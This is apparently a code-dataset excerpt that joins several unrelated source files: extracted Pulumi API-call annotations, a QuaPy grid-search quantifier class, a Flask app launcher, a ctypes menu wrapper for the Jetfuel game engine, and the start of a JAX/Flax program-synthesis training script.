duplicate_detection_history_time_window)\n", (3434, 3532), False, 'import pulumi\n'), ((3717, 3793), 'pulumi.set', 'pulumi.set', (['__self__', '"""enable_batched_operations"""', 'enable_batched_operations'], {}), "(__self__, 'enable_batched_operations', enable_batched_operations)\n", (3727, 3793), False, 'import pulumi\n'), ((4004, 4100), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_dead_lettered_messages_to"""', 'forward_dead_lettered_messages_to'], {}), "(__self__, 'forward_dead_lettered_messages_to',\n forward_dead_lettered_messages_to)\n", (4014, 4100), False, 'import pulumi\n'), ((4238, 4284), 'pulumi.set', 'pulumi.set', (['__self__', '"""forward_to"""', 'forward_to'], {}), "(__self__, 'forward_to', forward_to)\n", (4248, 4284), False, 'import pulumi\n'), ((4402, 4432), 'pulumi.set', 'pulumi.set', (['__self__', '"""id"""', 'id'], {}), "(__self__, 'id', id)\n", (4412, 4432), False, 'import pulumi\n'), ((4594, 4652), 'pulumi.set', 'pulumi.set', (['__self__', '"""is_client_affine"""', 'is_client_affine'], {}), "(__self__, 'is_client_affine', is_client_affine)\n", (4604, 4652), False, 'import pulumi\n'), ((4803, 4855), 'pulumi.set', 'pulumi.set', (['__self__', '"""lock_duration"""', 'lock_duration'], {}), "(__self__, 'lock_duration', lock_duration)\n", (4813, 4855), False, 'import pulumi\n'), ((5021, 5083), 'pulumi.set', 'pulumi.set', (['__self__', '"""max_delivery_count"""', 'max_delivery_count'], {}), "(__self__, 'max_delivery_count', max_delivery_count)\n", (5031, 5083), False, 'import pulumi\n'), ((5238, 5290), 'pulumi.set', 'pulumi.set', (['__self__', '"""message_count"""', 'message_count'], {}), "(__self__, 'message_count', message_count)\n", (5248, 5290), False, 'import pulumi\n'), ((5414, 5448), 'pulumi.set', 'pulumi.set', (['__self__', '"""name"""', 'name'], {}), "(__self__, 'name', name)\n", (5424, 5448), False, 'import pulumi\n'), ((5610, 5668), 'pulumi.set', 'pulumi.set', (['__self__', '"""requires_session"""', 'requires_session'], {}), "(__self__, 'requires_session', requires_session)\n", (5620, 5668), False, 'import pulumi\n'), ((5798, 5836), 'pulumi.set', 'pulumi.set', (['__self__', '"""status"""', 'status'], {}), "(__self__, 'status', status)\n", (5808, 5836), False, 'import pulumi\n'), ((5983, 6031), 'pulumi.set', 'pulumi.set', (['__self__', '"""system_data"""', 'system_data'], {}), "(__self__, 'system_data', system_data)\n", (5993, 6031), False, 'import pulumi\n'), ((6155, 6189), 'pulumi.set', 'pulumi.set', (['__self__', '"""type"""', 'type'], {}), "(__self__, 'type', type)\n", (6165, 6189), False, 'import pulumi\n'), ((6331, 6377), 'pulumi.set', 'pulumi.set', (['__self__', '"""updated_at"""', 'updated_at'], {}), "(__self__, 'updated_at', updated_at)\n", (6341, 6377), False, 'import pulumi\n'), ((6572, 6603), 'pulumi.get', 'pulumi.get', (['self', '"""accessed_at"""'], {}), "(self, 'accessed_at')\n", (6582, 6603), False, 'import pulumi\n'), ((6877, 6916), 'pulumi.get', 'pulumi.get', (['self', '"""auto_delete_on_idle"""'], {}), "(self, 'auto_delete_on_idle')\n", (6887, 6916), False, 'import pulumi\n'), ((7177, 7221), 'pulumi.get', 'pulumi.get', (['self', '"""client_affine_properties"""'], {}), "(self, 'client_affine_properties')\n", (7187, 7221), False, 'import pulumi\n'), ((7416, 7449), 'pulumi.get', 'pulumi.get', (['self', '"""count_details"""'], {}), "(self, 'count_details')\n", (7426, 7449), False, 'import pulumi\n'), ((7618, 7648), 'pulumi.get', 'pulumi.get', (['self', '"""created_at"""'], {}), "(self, 'created_at')\n", (7628, 7648), False, 'import pulumi\n'), ((7961, 8027), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_filter_evaluation_exceptions"""'], {}), "(self, 'dead_lettering_on_filter_evaluation_exceptions')\n", (7971, 8027), False, 'import pulumi\n'), ((8312, 8368), 'pulumi.get', 'pulumi.get', (['self', '"""dead_lettering_on_message_expiration"""'], {}), "(self, 'dead_lettering_on_message_expiration')\n", (8322, 8368), False, 'import pulumi\n'), ((8781, 8829), 'pulumi.get', 'pulumi.get', (['self', '"""default_message_time_to_live"""'], {}), "(self, 'default_message_time_to_live')\n", (8791, 8829), False, 'import pulumi\n'), ((9150, 9209), 'pulumi.get', 'pulumi.get', (['self', '"""duplicate_detection_history_time_window"""'], {}), "(self, 'duplicate_detection_history_time_window')\n", (9160, 9209), False, 'import pulumi\n'), ((9455, 9500), 'pulumi.get', 'pulumi.get', (['self', '"""enable_batched_operations"""'], {}), "(self, 'enable_batched_operations')\n", (9465, 9500), False, 'import pulumi\n'), ((9738, 9791), 'pulumi.get', 'pulumi.get', (['self', '"""forward_dead_lettered_messages_to"""'], {}), "(self, 'forward_dead_lettered_messages_to')\n", (9748, 9791), False, 'import pulumi\n'), ((9975, 10005), 'pulumi.get', 'pulumi.get', (['self', '"""forward_to"""'], {}), "(self, 'forward_to')\n", (9985, 10005), False, 'import pulumi\n'), ((10124, 10146), 'pulumi.get', 'pulumi.get', (['self', '"""id"""'], {}), "(self, 'id')\n", (10134, 10146), False, 'import pulumi\n'), ((10381, 10417), 'pulumi.get', 'pulumi.get', (['self', '"""is_client_affine"""'], {}), "(self, 'is_client_affine')\n", (10391, 10417), False, 'import pulumi\n'), ((10651, 10684), 'pulumi.get', 'pulumi.get', (['self', '"""lock_duration"""'], {}), "(self, 'lock_duration')\n", (10661, 10684), False, 'import pulumi\n'), ((10872, 10910), 'pulumi.get', 'pulumi.get', (['self', '"""max_delivery_count"""'], {}), "(self, 'max_delivery_count')\n", (10882, 10910), False, 'import pulumi\n'), ((11071, 11104), 'pulumi.get', 'pulumi.get', (['self', '"""message_count"""'], {}), "(self, 'message_count')\n", (11081, 11104), False, 'import pulumi\n'), ((11227, 11251), 'pulumi.get', 'pulumi.get', (['self', '"""name"""'], {}), "(self, 'name')\n", (11237, 11251), False, 'import pulumi\n'), ((11476, 11512), 'pulumi.get', 'pulumi.get', (['self', '"""requires_session"""'], {}), "(self, 'requires_session')\n", (11486, 11512), False, 'import pulumi\n'), ((11702, 11728), 'pulumi.get', 'pulumi.get', (['self', '"""status"""'], {}), "(self, 'status')\n", (11712, 11728), False, 'import pulumi\n'), ((11936, 11967), 'pulumi.get', 'pulumi.get', (['self', '"""system_data"""'], {}), "(self, 'system_data')\n", (11946, 11967), False, 'import pulumi\n'), ((12090, 12114), 'pulumi.get', 'pulumi.get', (['self', '"""type"""'], {}), "(self, 'type')\n", (12100, 12114), False, 'import pulumi\n'), ((12287, 12317), 'pulumi.get', 'pulumi.get', (['self', '"""updated_at"""'], {}), "(self, 'updated_at')\n", (12297, 12317), False, 'import pulumi\n'), ((14701, 14723), 'pulumi.InvokeOptions', 'pulumi.InvokeOptions', ([], {}), '()\n', (14721, 14723), False, 'import pulumi\n'), ((14815, 14953), 'pulumi.runtime.invoke', 'pulumi.runtime.invoke', (['"""azure-native:servicebus/v20210601preview:getSubscription"""', '__args__'], {'opts': 'opts', 'typ': 'GetSubscriptionResult'}), "(\n 'azure-native:servicebus/v20210601preview:getSubscription', __args__,\n opts=opts, typ=GetSubscriptionResult)\n", (14836, 14953), False, 'import pulumi\n')] |
import itertools
import signal
from copy import deepcopy
from typing import Union, Callable
import numpy as np
import quapy as qp
from quapy.data.base import LabelledCollection
from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction
from quapy.method.aggregative import BaseQuantifier
import inspect
from util import _check_sample_size
class GridSearchQ(BaseQuantifier):
"""Grid Search optimization targeting a quantification-oriented metric.
Optimizes the hyperparameters of a quantification method, based on an evaluation method and on an evaluation
protocol for quantification.
:param model: the quantifier to optimize
:type model: BaseQuantifier
:param param_grid: a dictionary with keys the parameter names and values the list of values to explore
:param sample_size: the size of the samples to extract from the validation set (ignored if protocl='gen')
:param protocol: either 'app' for the artificial prevalence protocol, 'npp' for the natural prevalence
protocol, or 'gen' for using a custom sampling generator function
:param n_prevpoints: if specified, indicates the number of equally distant points to extract from the interval
[0,1] in order to define the prevalences of the samples; e.g., if n_prevpoints=5, then the prevalences for
each class will be explored in [0.00, 0.25, 0.50, 0.75, 1.00]. If not specified, then eval_budget is requested.
Ignored if protocol!='app'.
:param n_repetitions: the number of repetitions for each combination of prevalences. This parameter is ignored
for the protocol='app' if eval_budget is set and is lower than the number of combinations that would be
generated using the value assigned to n_prevpoints (for the current number of classes and n_repetitions).
Ignored for protocol='npp' and protocol='gen' (use eval_budget for setting a maximum number of samples in
those cases).
:param eval_budget: if specified, sets a ceil on the number of evaluations to perform for each hyper-parameter
combination. For example, if protocol='app', there are 3 classes, n_repetitions=1 and eval_budget=20, then
n_prevpoints will be set to 5, since this will generate 15 different prevalences, i.e., [0, 0, 1],
[0, 0.25, 0.75], [0, 0.5, 0.5] ... [1, 0, 0], and since setting it to 6 would generate more than
20. When protocol='gen', indicates the maximum number of samples to generate, but less samples will be
generated if the generator yields less samples.
:param error: an error function (callable) or a string indicating the name of an error function (valid ones
are those in qp.error.QUANTIFICATION_ERROR
:param refit: whether or not to refit the model on the whole labelled collection (training+validation) with
the best chosen hyperparameter combination. Ignored if protocol='gen'
:param val_split: either a LabelledCollection on which to test the performance of the different settings, or
a float in [0,1] indicating the proportion of labelled data to extract from the training set, or a callable
returning a generator function each time it is invoked (only for protocol='gen').
:param n_jobs: number of parallel jobs
:param random_seed: set the seed of the random generator to replicate experiments. Ignored if protocol='gen'.
:param timeout: establishes a timer (in seconds) for each of the hyperparameters configurations being tested.
Whenever a run takes longer than this timer, that configuration will be ignored. If all configurations end up
being ignored, a TimeoutError exception is raised. If -1 (default) then no time bound is set.
:param verbose: set to True to get information through the stdout
"""
def __init__(self,
model: BaseQuantifier,
param_grid: dict,
sample_size: Union[int, None] = None,
protocol='app',
n_prevpoints: int = None,
n_repetitions: int = 1,
eval_budget: int = None,
error: Union[Callable, str] = qp.error.mae,
refit=True,
val_split=0.4,
n_jobs=1,
random_seed=42,
timeout=-1,
verbose=False):
self.model = model
self.param_grid = param_grid
self.sample_size = sample_size
self.protocol = protocol.lower()
self.n_prevpoints = n_prevpoints
self.n_repetitions = n_repetitions
self.eval_budget = eval_budget
self.refit = refit
self.val_split = val_split
self.n_jobs = n_jobs
self.random_seed = random_seed
self.timeout = timeout
self.verbose = verbose
self.__check_error(error)
assert self.protocol in {'app', 'npp', 'gen'}, \
'unknown protocol: valid ones are "app" or "npp" for the "artificial" or the "natural" prevalence ' \
'protocols. Use protocol="gen" when passing a generator function thorough val_split that yields a ' \
'sample (instances) and their prevalence (ndarray) at each iteration.'
assert self.eval_budget is None or isinstance(self.eval_budget, int)
if self.protocol in ['npp', 'gen']:
if self.protocol=='npp' and (self.eval_budget is None or self.eval_budget <= 0):
raise ValueError(f'when protocol="npp" the parameter eval_budget should be '
f'indicated (and should be >0).')
if self.n_repetitions != 1:
print('[warning] n_repetitions has been set and will be ignored for the selected protocol')
def _sout(self, msg):
if self.verbose:
print(f'[{self.__class__.__name__}]: {msg}')
def __check_training_validation(self, training, validation):
if isinstance(validation, LabelledCollection):
return training, validation
elif isinstance(validation, float):
assert 0. < validation < 1., 'validation proportion should be in (0,1)'
training, validation = training.split_stratified(train_prop=1 - validation, random_state=self.random_seed)
return training, validation
elif self.protocol=='gen' and inspect.isgenerator(validation()):
return training, validation
else:
raise ValueError(f'"validation" must either be a LabelledCollection or a float in (0,1) indicating the'
f'proportion of training documents to extract (type found: {type(validation)}). '
f'Optionally, "validation" can be a callable function returning a generator that yields '
f'the sample instances along with their true prevalence at each iteration by '
f'setting protocol="gen".')
def __check_error(self, error):
if error in qp.error.QUANTIFICATION_ERROR:
self.error = error
elif isinstance(error, str):
self.error = qp.error.from_name(error)
elif hasattr(error, '__call__'):
self.error = error
else:
raise ValueError(f'unexpected error type; must either be a callable function or a str representing\n'
f'the name of an error function in {qp.error.QUANTIFICATION_ERROR_NAMES}')
def __generate_predictions(self, model, val_split):
commons = {
'n_repetitions': self.n_repetitions,
'n_jobs': self.n_jobs,
'random_seed': self.random_seed,
'verbose': False
}
if self.protocol == 'app':
return artificial_prevalence_prediction(
model, val_split, self.sample_size,
n_prevpoints=self.n_prevpoints,
eval_budget=self.eval_budget,
**commons
)
elif self.protocol == 'npp':
return natural_prevalence_prediction(
model, val_split, self.sample_size,
**commons)
elif self.protocol == 'gen':
return gen_prevalence_prediction(model, gen_fn=val_split, eval_budget=self.eval_budget)
else:
raise ValueError('unknown protocol')
def fit(self, training: LabelledCollection, val_split: Union[LabelledCollection, float, Callable] = None):
""" Learning routine. Fits methods with all combinations of hyperparameters and selects the one minimizing
the error metric.
:param training: the training set on which to optimize the hyperparameters
:param val_split: either a LabelledCollection on which to test the performance of the different settings, or
a float in [0,1] indicating the proportion of labelled data to extract from the training set
:return: self
"""
if val_split is None:
val_split = self.val_split
training, val_split = self.__check_training_validation(training, val_split)
if self.protocol != 'gen':
self.sample_size = _check_sample_size(self.sample_size)
params_keys = list(self.param_grid.keys())
params_values = list(self.param_grid.values())
model = self.model
if self.timeout > 0:
def handler(signum, frame):
self._sout('timeout reached')
raise TimeoutError()
signal.signal(signal.SIGALRM, handler)
self.param_scores_ = {}
self.best_score_ = None
some_timeouts = False
for values in itertools.product(*params_values):
params = dict({k: values[i] for i, k in enumerate(params_keys)})
if self.timeout > 0:
signal.alarm(self.timeout)
try:
# overrides default parameters with the parameters being explored at this iteration
model.set_params(**params)
model.fit(training)
true_prevalences, estim_prevalences = self.__generate_predictions(model, val_split)
score = self.error(true_prevalences, estim_prevalences)
self._sout(f'checking hyperparams={params} got {self.error.__name__} score {score:.5f}')
if self.best_score_ is None or score < self.best_score_:
self.best_score_ = score
self.best_params_ = params
self.best_model_ = deepcopy(model)
self.param_scores_[str(params)] = score
if self.timeout > 0:
signal.alarm(0)
except TimeoutError:
print(f'timeout reached for config {params}')
some_timeouts = True
if self.best_score_ is None and some_timeouts:
raise TimeoutError('all jobs took more than the timeout time to end')
self._sout(f'optimization finished: best params {self.best_params_} (score={self.best_score_:.5f})')
if self.refit:
self._sout(f'refitting on the whole development set')
self.best_model_.fit(training + val_split)
return self
def quantify(self, instances):
"""Estimate class prevalence values using the best model found after calling the :meth:`fit` method.
:param instances: sample contanining the instances
:return: a ndarray of shape `(n_classes)` with class prevalence estimates as according to the best model found
by the model selection process.
"""
assert hasattr(self, 'best_model_'), 'quantify called before fit'
return self.best_model().quantify(instances)
@property
def classes_(self):
"""
Classes on which the quantifier has been trained on.
:return: a ndarray of shape `(n_classes)` with the class identifiers
"""
return self.best_model().classes_
def set_params(self, **parameters):
"""Sets the hyper-parameters to explore.
:param parameters: a dictionary with keys the parameter names and values the list of values to explore
"""
self.param_grid = parameters
def get_params(self, deep=True):
"""Returns the dictionary of hyper-parameters to explore (`param_grid`)
:param deep: Unused
:return: the dictionary `param_grid`
"""
return self.param_grid
def best_model(self):
"""
Returns the best model found after calling the :meth:`fit` method, i.e., the one trained on the combination
of hyper-parameters that minimized the error function.
:return: a trained quantifier
"""
if hasattr(self, 'best_model_'):
return self.best_model_
raise ValueError('best_model called before fit')
| [
"quapy.evaluation.natural_prevalence_prediction",
"signal.signal",
"util._check_sample_size",
"itertools.product",
"quapy.error.from_name",
"quapy.evaluation.artificial_prevalence_prediction",
"quapy.evaluation.gen_prevalence_prediction",
"signal.alarm",
"copy.deepcopy"
] | [((9694, 9727), 'itertools.product', 'itertools.product', (['*params_values'], {}), '(*params_values)\n', (9711, 9727), False, 'import itertools\n'), ((7798, 7943), 'quapy.evaluation.artificial_prevalence_prediction', 'artificial_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {'n_prevpoints': 'self.n_prevpoints', 'eval_budget': 'self.eval_budget'}), '(model, val_split, self.sample_size,\n n_prevpoints=self.n_prevpoints, eval_budget=self.eval_budget, **commons)\n', (7830, 7943), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9200, 9236), 'util._check_sample_size', '_check_sample_size', (['self.sample_size'], {}), '(self.sample_size)\n', (9218, 9236), False, 'from util import _check_sample_size\n'), ((9538, 9576), 'signal.signal', 'signal.signal', (['signal.SIGALRM', 'handler'], {}), '(signal.SIGALRM, handler)\n', (9551, 9576), False, 'import signal\n'), ((7169, 7194), 'quapy.error.from_name', 'qp.error.from_name', (['error'], {}), '(error)\n', (7187, 7194), True, 'import quapy as qp\n'), ((8074, 8150), 'quapy.evaluation.natural_prevalence_prediction', 'natural_prevalence_prediction', (['model', 'val_split', 'self.sample_size'], {}), '(model, val_split, self.sample_size, **commons)\n', (8103, 8150), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((9856, 9882), 'signal.alarm', 'signal.alarm', (['self.timeout'], {}), '(self.timeout)\n', (9868, 9882), False, 'import signal\n'), ((8240, 8325), 'quapy.evaluation.gen_prevalence_prediction', 'gen_prevalence_prediction', (['model'], {'gen_fn': 'val_split', 'eval_budget': 'self.eval_budget'}), '(model, gen_fn=val_split, eval_budget=self.eval_budget\n )\n', (8265, 8325), False, 'from quapy.evaluation import artificial_prevalence_prediction, natural_prevalence_prediction, gen_prevalence_prediction\n'), ((10562, 10577), 'copy.deepcopy', 'deepcopy', (['model'], {}), '(model)\n', (10570, 10577), False, 'from copy import deepcopy\n'), ((10692, 10707), 'signal.alarm', 'signal.alarm', (['(0)'], {}), '(0)\n', (10704, 10707), False, 'import signal\n')] |
# -*- coding: utf-8 -*-
import os
from flask_migrate import Migrate
from app import create_app, db
from app.models import User, Role, PoseToLocation
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
migrate = Migrate(app, db)
# migrate 的新建 我们需要扫描到这些文件我们才能创建
@app.shell_context_processor
def make_shell_context():
return dict(db=db, User=User, Role=Role, PoseToLocation=PoseToLocation)
# 单元测试
@app.cli.command()
def test():
""" run the unit tests """
import unittest
tests = unittest.TestLoader().discover('tests')
unittest.TextTestRunner(verbosity=2).run(tests)
| [
"unittest.TestLoader",
"flask_migrate.Migrate",
"unittest.TextTestRunner",
"os.getenv"
] | [((220, 236), 'flask_migrate.Migrate', 'Migrate', (['app', 'db'], {}), '(app, db)\n', (227, 236), False, 'from flask_migrate import Migrate\n'), ((170, 195), 'os.getenv', 'os.getenv', (['"""FLASK_CONFIG"""'], {}), "('FLASK_CONFIG')\n", (179, 195), False, 'import os\n'), ((505, 526), 'unittest.TestLoader', 'unittest.TestLoader', ([], {}), '()\n', (524, 526), False, 'import unittest\n'), ((549, 585), 'unittest.TextTestRunner', 'unittest.TextTestRunner', ([], {'verbosity': '(2)'}), '(verbosity=2)\n', (572, 585), False, 'import unittest\n')] |
# Jetfuel Game Engine- A SDL-based 2D game-engine
# Copyright (C) 2018 InfernoStudios
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ctypes import c_uint
from ctypes import c_int
from ctypes import c_void_p
from ctypes import c_bool
from ctypes import c_wchar_p
from jetfuel.draw.rectangleinterface import rectangle_interface
from jetfuel.draw.image import image
class menu(rectangle_interface):
def __init__(self, jetfuelsoloader, maxheight=None, columngap=None,
buttongap=None):
self._jetfuel = jetfuelsoloader.jetfuelso;
if(maxheight is not None and columngap is not None and
buttongap is not None):
self._jetfuel.Menu_new_from_heights_and_gaps.argtypes = [c_uint,
c_uint,
c_uint];
self._jetfuel.Menu_new_from_heights_and_gaps.restype = c_void_p;
self.drawableref = self._jetfuel.Menu_new_from_heights_and_gaps(
maxheight,
columngap,
buttongap);
else:
self._jetfuel.Menu_new.restype = c_void_p;
self.drawableref = self._jetfuel.Menu_new();
print("Constructed empty drawableref!");
def get_max_height(self):
self._jetfuel.Menu_get_max_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_max_height.restype = c_uint;
return self._jetfuel.Menu_get_max_height(self.drawableref);
def set_max_height(self, maxheight):
self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];
self._jetfuel.Menu_set_max_height(self.drawableref, maxheight);
def get_column_gap(self):
self._jetfuel.Menu_get_column_gap.argtypes = [c_void_p];
self._jetfuel.Menu_get_column_gap.restype = c_uint;
return self._jetfuel.Menu_get_column_gap(self.drawableref);
def set_column_gap(self, columngap):
self._jetfuel.Menu_set_column_gap.argtypes = [c_void_p, c_uint];
self._jetfuel.Menu_set_column_height(self.drawableref, columngap);
def get_button_gap(self):
self._jetfuel.Menu_get_button_gap.argtypes = [c_void_p];
self._jetfuel.Menu_get_button_gap.restype = c_uint;
return self._jetfuel.Menu_get_column_gap(self.drawableref);
def set_button_gap(self, buttongap):
self._jetfuel.Menu_set_max_height.argtypes = [c_void_p, c_uint];
self._jetfuel.Menu_set_max_height(self.drawableref, buttongap);
def get_container_box_image(self, jetfuelsoloader):
self._jetfuel.Menu_get_container_box_image.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_image.restype = c_void_p;
containerboximage = image(jetfuelsoloader);
self._jetfuel.Image_delete.argtypes = [c_void_p];
self._jetfuel.Image_delete(containerboximage.imageref);
containerboximage.imageref = self._jetfuel.Menu_get_container_box_image(
self.drawableref);
return containerboximage;
def set_container_box_image(self, image, borderwidth, borderheight):
self._jetfuel.Menu_set_container_box_image.argtypes = [c_void_p,
c_void_p, c_uint,
c_uint];
self._jetfuel.Menu_set_container_box_image(image.imageref, borderwidth,
borderheight);
def get_container_box_border_width(self):
self._jetfuel.Menu_get_container_box_border_width.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_border_width.restype = c_uint;
return self._jetfuel.Menu_get_container_box_border_width(
self.drawableref);
def get_container_box_border_height(self):
self._jetfuel.Menu_get_container_box_border_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_container_box_border_height.restype = c_uint;
return self._jetfuel.Menu_get_container_box_border_height(
self.drawableref);
def add_button(self, buttoncharsreplacement, uisactiontowatchfor,
messagetosenduponclick, messagebus):
self._jetfuel.Menu_add_button.argtypes = [c_void_p, c_void_p,
c_wchar_p, c_wchar_p,
c_void_p];
self._jetfuel.Menu_add_button.restype = c_bool;
return self._jetfuel.Menu_add_button(self.drawableref,
buttoncharsreplacement.buttoncharsref,
uisactiontowatchfor,
messagetosenduponclick,
messagebus.messagebusref);
def get_position_x(self):
self._jetfuel.Menu_get_position_x.argtypes = [c_void_p];
self._jetfuel.Menu_get_position_x.restype = c_int;
return self.Menu_get_position_x(self.drawableref);
def get_position_y(self):
self._jetfuel.Menu_get_position_y.argtypes = [c_void_p];
self._jetfuel.Menu_get_position_y.restype = c_int;
return self.Menu_get_position_y(self.drawableref);
def set_position(self, x, y):
self._jetfuel.Menu_set_position.argtypes = [c_void_p, c_int, c_int];
self._jetfuel.Menu_set_position(self.drawableref, x, y);
def get_rect_to_draw_width(self):
self._jetfuel.Menu_get_rect_to_draw_width.argtypes = [c_void_p];
self._jetfuel.Menu_get_rect_to_draw_width.restype = c_int;
return self.Menu_get_rect_to_draw_width(self.drawableref);
def get_rect_to_draw_height(self):
self._jetfuel.Menu_get_rect_to_draw_height.argtypes = [c_void_p];
self._jetfuel.Menu_get_rect_to_draw_height.restype = c_int;
return self.Menu_get_rect_to_draw_height(self.drawableref);
| [
"jetfuel.draw.image.image"
] | [((3591, 3613), 'jetfuel.draw.image.image', 'image', (['jetfuelsoloader'], {}), '(jetfuelsoloader)\n', (3596, 3613), False, 'from jetfuel.draw.image import image\n')] |
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# python3
"""Train seq-to-seq model on random supervised training tasks."""
# pytype: disable=wrong-arg-count
# pytype: disable=attribute-error
import collections
import functools
import json
import os
import random
import sys
import time
from absl import app
from absl import flags
from absl import logging
from flax import jax_utils
from flax import linen as nn
from flax import optim
from flax.metrics import tensorboard
from flax.training import checkpoints
from flax.training import common_utils
import jax
import jax.numpy as jnp
import numpy as np
import tensorflow.compat.v2 as tf
from latent_programmer import decode
from latent_programmer import models as base_models
from latent_programmer.decomposition_transformer_attention import decomposition_models as models
from latent_programmer.decomposition_transformer_attention import input_pipeline
from latent_programmer.tasks.robust_fill import dsl
from latent_programmer.tasks.robust_fill import tokens as dsl_tokens
sys.path.append('../../')
gfile = tf.io.gfile
FLAGS = flags.FLAGS
flags.DEFINE_integer('seed', 0, 'Fixed random seed for training.')
flags.DEFINE_float('lr', 1e-3, 'Learning rate.')
flags.DEFINE_float('weight_decay', 1e-1,
'Decay factor for AdamW-style weight decay.')
flags.DEFINE_integer('embedding_dim', 256, 'Embedding dimension.')
flags.DEFINE_integer('hidden_dim', 512, 'Hidden dimension.')
flags.DEFINE_integer('num_heads', 4, 'Number of layers.')
flags.DEFINE_integer('num_layers', 3, 'Number of Transformer heads.')
flags.DEFINE_boolean('slow_decode', True, 'Use slow decoding for prediction?')
flags.DEFINE_string('dataset_filepattern', None,
'Filepattern for TFRecord dataset.')
flags.DEFINE_integer('per_device_batch_size', 16,
'Number of program tasks in a batch.')
flags.DEFINE_integer('num_strings_per_task', 4,
'Number of input/output strings per task.')
flags.DEFINE_integer('max_program_length', 100,
'Maximum number of tokens in program.')
flags.DEFINE_integer('max_characters', 120,
'Maximum number of characters in input/output strings.')
flags.DEFINE_string('save_dir', None, 'Directory to save results to.')
flags.DEFINE_integer('num_train_steps', 2000000, 'Number of training steps.')
flags.DEFINE_integer('num_eval_steps', 10, 'Number of evaluation steps.')
flags.DEFINE_integer('log_freq', 1000, 'Number of steps between training logs.')
flags.DEFINE_integer('eval_freq', 2000, 'Number of steps between eval.')
flags.DEFINE_integer('predict_freq', 50000,
'Number of steps between prediction (beam search).')
flags.DEFINE_integer('checkpoint_freq', 50000,
'Number of steps between checkpoint saves.')
flags.DEFINE_integer('finetune_start_step', -1,
'Step the initial checkpoint should start at for '
'finetuning, or -1 if not finetuning.')
flags.DEFINE_bool('restore_checkpoints', True,
'Whether to restore from existing model checkpoints.')
flags.DEFINE_string('attention_mask_type', 'bos_full_attention',
'The kind of attention mask to use. Options are: baseline, '
'bos_to_bos, bos_full_attention')
flags.DEFINE_bool('use_relative_attention', True,
'Whether to use relative positonal embeddings.')
flags.DEFINE_bool('bos_special_attention', False,
'Whether to use special relative attention computation for '
'BOS tokens.')
_internal = False
if not _internal:
flags.DEFINE_string('xm_parameters', None,
'String specifying hyperparamter search.')
def create_learning_rate_scheduler(
base_learning_rate=0.5,
factors='constant * linear_warmup * rsqrt_normalized_decay',
warmup_steps=16000,
decay_factor=0.5,
steps_per_decay=50000,
steps_per_cycle=100000):
"""Creates learning rate schedule.
Interprets factors in the factors string which can consist of:
* constant: interpreted as the constant value,
* linear_warmup: interpreted as linear warmup until warmup_steps,
* rsqrt_decay: divide by square root of max(step, warmup_steps)
* decay_every: Every k steps decay the learning rate by decay_factor.
* cosine_decay: Cyclic cosine decay, uses steps_per_cycle parameter.
Args:
base_learning_rate: float, the starting constant for the lr schedule.
factors: a string with factors separated by '*' that defines the schedule.
warmup_steps: how many steps to warm up for in the warmup schedule.
decay_factor: The amount to decay the learning rate by.
steps_per_decay: How often to decay the learning rate.
steps_per_cycle: Steps per cycle when using cosine decay.
Returns:
A function learning_rate(step): float -> {'learning_rate': float}, the
step-dependent lr.
"""
factors = [n.strip() for n in factors.split('*')]
def step_fn(step):
"""Step to learning rate function."""
ret = 1.0
for name in factors:
if name == 'constant':
ret *= base_learning_rate
elif name == 'linear_warmup':
ret *= jnp.minimum(1.0, step / warmup_steps)
elif name == 'rsqrt_decay':
ret /= jnp.sqrt(jnp.maximum(1.0, step - warmup_steps))
elif name == 'rsqrt_normalized_decay':
ret *= jnp.sqrt(warmup_steps)
ret /= jnp.sqrt(jnp.maximum(step, warmup_steps))
elif name == 'decay_every':
ret *= (decay_factor**(step // steps_per_decay))
elif name == 'cosine_decay':
progress = jnp.maximum(0.0,
(step - warmup_steps) / float(steps_per_cycle))
ret *= jnp.maximum(0.0,
0.5 * (1.0 + jnp.cos(jnp.pi * (progress % 1.0))))
else:
raise ValueError('Unknown factor %s.' % name)
return jnp.asarray(ret, dtype=jnp.float32)
return step_fn
def compute_weighted_cross_entropy(logits, targets, weights=None):
"""Compute weighted cross entropy and entropy for log probs and targets.
Args:
logits: `[batch, length, num_classes]` float array.
targets: categorical targets `[batch, length]` int array.
weights: None or array of shape [batch, length, 1]
Returns:
Tuple of scalar loss and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
raise ValueError('Incorrect shapes. Got shape %s logits and %s targets' %
(str(logits.shape), str(targets.shape)))
onehot_targets = common_utils.onehot(targets, logits.shape[-1])
loss = -jnp.sum(onehot_targets * nn.log_softmax(logits), axis=-1)
normalizing_factor = jnp.prod(jnp.asarray(targets.shape))
if weights is not None:
loss = loss * weights
normalizing_factor = weights.sum()
return loss.sum(), normalizing_factor
def compute_weighted_accuracy(logits, targets, weights=None):
"""Compute weighted accuracy for log probs and targets.
Args:
logits: `[batch, length, num_classes]` float array.
targets: categorical targets `[batch, length]` int array.
weights: None or array of shape [batch, length, 1]
Returns:
Tuple of scalar accuracy and batch normalizing factor.
"""
if logits.ndim != targets.ndim + 1:
